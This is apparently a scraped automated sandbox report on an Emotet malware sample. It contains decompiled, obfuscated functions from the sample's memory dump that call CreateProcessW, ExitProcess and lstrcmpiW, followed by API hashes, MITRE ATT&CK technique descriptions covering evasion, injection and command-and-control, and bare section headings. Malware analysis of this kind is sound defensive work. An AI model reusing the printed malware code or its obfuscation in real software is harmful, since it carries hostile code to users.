				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E00632309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

0x006531da
0x006531df
0x006531e1
0x006531e4
0x006531e7
0x006531e8
0x006531e9
0x006531ec
0x006531ef
0x006531f2
0x006531f3
0x006531f4
0x006531f7
0x006531fa
0x006531fd
0x006531fe
0x00653200
0x00653205
0x0065320f
0x00653214
0x0065321b
0x0065321f
0x00653223
0x0065322a
0x00653231
0x00653235
0x00653241
0x00653249
0x0065324c
0x00653253
0x0065325a
0x0065325e
0x00653265
0x0065326c
0x00653273
0x0065327a
0x00653281
0x006532a1
0x006532bb
0x006532c2

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 006532BB

Memory Dump Source

Source File: 00000004.00000002.997117139.0000000000630000.00000040.00000010.sdmp, Offset: 00630000, based on PE: true

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: 5179b2e3e8a6ff70ed9af7ed02957d254cf6851648dc6fd7ce9577c32e5e081e
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 87310472801249BBCF65DF96CD09CDFBFB5FB89704F108188F91462220D3B58A64DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00634248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00634248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E00632309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

0x0063424e
0x00634254
0x0063425b
0x00634262
0x00634269
0x00634272
0x00634277
0x0063427c
0x00634283
0x0063428a
0x00634291
0x00634298
0x006342a2
0x006342aa
0x006342ad
0x006342b1
0x006342b5
0x006342bc
0x006342c3
0x006342c7
0x006342e7
0x006342f1

APIs

ExitProcess.KERNEL32(00000000), ref: 006342F1

Memory Dump Source

Source File: 00000004.00000002.997117139.0000000000630000.00000040.00000010.sdmp, Offset: 00630000, based on PE: true

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: de5a25a538a030a3b993a20dc3f34436bdd7baa7d33004b477d0c86021bf4609
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: 491128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208089E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 006417CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E006417CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00652523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E00632309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

0x006417d2
0x006417d5
0x006417d7
0x006417db
0x006417dc
0x006417e1
0x006417e8
0x006417f1
0x006417f8
0x006417ff
0x00641803
0x00641807
0x0064180e
0x0064181b
0x00641822
0x00641825
0x0064182c
0x00641833
0x00641844
0x00641847
0x00641859
0x0064185c
0x00641863
0x0064186a
0x0064186e
0x00641881
0x0064188d
0x00641893

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 0064188D

Memory Dump Source

Source File: 00000004.00000002.997117139.0000000000630000.00000040.00000010.sdmp, Offset: 00630000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 4cd09f74a49200b235dc9c6e7b5d30afa5118a87d5b49201c5a14a2c5dccdf74
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 3A2115B5D0020DFBDB08DFA4C94A9EEBBB5EB44304F10818DE425A7240E3B56B049F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report tUJXpPwU27

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

Function 6E7D6430, Relevance: 120.9, APIs: 65, Strings: 3, Instructions: 1860
threadwindowmemoryCOMMONCrypto